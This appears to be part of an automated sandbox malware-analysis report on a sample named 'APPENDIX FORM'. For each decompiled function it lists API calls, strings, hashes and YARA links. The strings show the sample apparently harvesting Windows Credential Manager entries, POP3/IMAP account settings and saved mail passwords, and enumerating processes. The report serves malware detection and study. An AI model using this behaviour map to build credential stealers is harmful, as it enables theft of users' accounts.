                                                                                                              • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc$Library$FreeLoad
                                                                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                              • API String ID: 2449869053-232097475
                                                                                                              • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                              • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                                                              • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                              • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                                                              Function 0040955A Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sprintf.MSVCRT ref: 0040957B
                                                                                                              • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                                                • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                                                • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                                                • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                                                • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                                              • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                                              • sprintf.MSVCRT ref: 004095EB
                                                                                                              • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                                              • memset.MSVCRT ref: 0040961C
                                                                                                              • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                                              • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                                              • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                              • String ID: caption$dialog_%d$menu_%d
                                                                                                              • API String ID: 3259144588-3822380221
                                                                                                              • Opcode ID: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                                                                                              • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                                                                              • Opcode Fuzzy Hash: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                                                                                              • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                                                                              Function 004045DB Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                              • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                              • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                              • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                              • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                              • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc$Library$FreeLoad
                                                                                                              • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                              • API String ID: 2449869053-4258758744
                                                                                                              • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                              • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                                                                              • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                              • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                                                                              Function 00404235 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100stringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • wcsstr.MSVCRT ref: 0040426A
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                                              • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                                                              • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                                                              • strchr.MSVCRT ref: 004042F6
                                                                                                              • strlen.MSVCRT ref: 0040430A
                                                                                                              • sprintf.MSVCRT ref: 0040432B
                                                                                                              • strchr.MSVCRT ref: 0040433C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                                              • String ID: %s@gmail.com$www.google.com
                                                                                                              • API String ID: 3866421160-4070641962
                                                                                                              • Opcode ID: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                                                                              • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                                                              • Opcode Fuzzy Hash: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                                                                              • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                                                              Function 0040E381 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 129COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                              • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                              • API String ID: 2360744853-2229823034
                                                                                                              • Opcode ID: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                                                                              • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                                                              • Opcode Fuzzy Hash: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                                                                              • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                                                              Function 004100CC Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • strchr.MSVCRT ref: 004100E4
                                                                                                              • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                                • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                              • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                                              • _mbscat.MSVCRT ref: 0041014D
                                                                                                              • memset.MSVCRT ref: 00410129
                                                                                                                • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                                                • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                                                              • memset.MSVCRT ref: 00410171
                                                                                                              • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                                                              • _mbscat.MSVCRT ref: 00410197
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                              • String ID: \systemroot
                                                                                                              • API String ID: 912701516-1821301763
                                                                                                              • Opcode ID: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                                                                              • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                                                              • Opcode Fuzzy Hash: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                                                                              • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                                                              Function 0040966C Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                              • _mbscpy.MSVCRT(0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409686
                                                                                                              • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409696
                                                                                                              • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                                                • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                              • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                              • API String ID: 888011440-2039793938
                                                                                                              • Opcode ID: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                                                                              • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                                                                              • Opcode Fuzzy Hash: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                                                                              • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                                                                              Function 00403166 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100stringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                                              • strchr.MSVCRT ref: 0040327B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: PrivateProfileStringstrchr
                                                                                                              • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                              • API String ID: 1348940319-1729847305
                                                                                                              • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                              • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                                                              • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                              • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                                                              Function 00411004 Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                                                              • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                                                              • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpy
                                                                                                              • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                              • API String ID: 3510742995-3273207271
                                                                                                              • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                              • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                                                              • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                              • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                                                              Function 004094A2 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 004094C8
                                                                                                              • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                                              • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                                              • memset.MSVCRT ref: 0040950C
                                                                                                              • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                                              • _strcmpi.MSVCRT ref: 00409531
                                                                                                                • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                              • String ID: sysdatetimepick32
                                                                                                              • API String ID: 3411445237-4169760276
                                                                                                              • Opcode ID: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                                                                              • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                                                              • Opcode Fuzzy Hash: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                                                                              • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                                                              Function 0040B38F Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                                              • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                                              • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                                              • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                                              • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                                              • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                                              • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                                              • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                              • String ID:
                                                                                                              • API String ID: 3642520215-0
                                                                                                              • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                              • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                                                              • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                              • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                                                              Function 004072D6 Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                                              • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                                              • GetDC.USER32(00000000), ref: 004072FB
                                                                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                                                                              • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                                                                              • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                                              • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                                              • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                              • String ID:
                                                                                                              • API String ID: 1999381814-0
                                                                                                              • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                              • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                                                              • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                              • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                                                              Function 004261F7 Relevance: 10.9, APIs: 2, Strings: 5, Instructions: 443COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpymemset
                                                                                                              • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                              • API String ID: 1297977491-3883738016
                                                                                                              • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                              • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                                                              • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                              • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                                                              Function 0041230B Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 187COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __aulldvrm$__aullrem
                                                                                                              • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                                                                              • API String ID: 643879872-978417875
                                                                                                              • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                              • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                                                                              • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                              • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                                                                              Function 004080ED Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0040810E
                                                                                                                • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                                              • LocalFree.KERNEL32(?,?,?,?,?,00000000,7686EB20,?), ref: 004081B9
                                                                                                                • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                                • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                                              • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                              • API String ID: 524865279-2190619648
                                                                                                              • Opcode ID: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                                                                                              • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                                                              • Opcode Fuzzy Hash: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                                                                                              • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
